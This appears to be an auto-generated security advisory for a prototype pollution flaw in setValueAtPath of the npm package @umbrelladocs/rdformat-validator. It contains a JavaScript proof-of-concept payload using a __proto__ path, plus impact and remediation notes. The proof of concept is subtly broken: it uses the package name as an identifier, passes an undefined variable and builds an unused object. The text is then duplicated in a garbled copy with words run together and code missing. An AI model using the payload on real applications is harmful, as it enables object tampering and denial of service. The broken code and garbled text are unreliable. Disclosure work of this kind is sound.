Prototype Pollution in @umbrelladocs/rdformat-validator
Summary
@umbrelladocs/rdformat-validator (<= 1.0.0) is vulnerable to Prototype Pollution via @umbrelladocs/rdformat-validator.Fixer.prototype.setValueAtPath.
Description
The function(s) @umbrelladocs/rdformat-validator.Fixer.prototype.setValueAtPath in @umbrelladocs/rdformat-validator do not properly restrict modifications to Object.prototype. When processing user-controlled input, an attacker can inject properties via __proto__ or constructor.prototype keys, polluting the prototype of all JavaScript objects in the application.
Attack vectors: array-path __proto__
Proof of Concept
const target = require('@umbrelladocs/rdformat-validator');
// 1. Pollute Object.prototype
const malicious = JSON.parse('{"__proto__":{"polluted":"yes"}}');
@umbrelladocs/rdformat-validator.Fixer.prototype.setValueAtPath({}, ["__proto__", key], "value");
// 2. Verify pollution
const obj = {};
console.log(obj.polluted); // "yes" - prototype is polluted
console.log('Vulnerable:', obj.polluted === 'yes');
Impact
Successful exploitation allows an attacker to:
- Denial of Service (DoS) by overriding critical object methods like
toString or hasOwnProperty
- Property Injection affecting all objects in the application
Remediation
Add key filtering to prevent prototype pollution:
function isSafe(key) {
return key !== '__proto__' && key !== 'constructor' && key !== 'prototype';
}
Or use Object.create(null) for target objects to prevent prototype chain access.
References
Prototype Pollution in
@umbrelladocs/rdformat-validatorSummary
@umbrelladocs/rdformat-validator(<= 1.0.0) is vulnerable to Prototype Pollution via@umbrelladocs/rdformat-validator.Fixer.prototype.setValueAtPath.Description
The function(s)
@umbrelladocs/rdformat-validator.Fixer.prototype.setValueAtPathin@umbrelladocs/rdformat-validatordo not properly restrict modifications toObject.prototype. When processing user-controlled input, an attacker can inject properties via__proto__orconstructor.prototypekeys, polluting the prototype of all JavaScript objects in the application.Attack vectors:
array-path __proto__Proof of Concept
Impact
Successful exploitation allows an attacker to:
toStringorhasOwnPropertyRemediation
Add key filtering to prevent prototype pollution:
Or use
Object.create(null)for target objects to prevent prototype chain access.References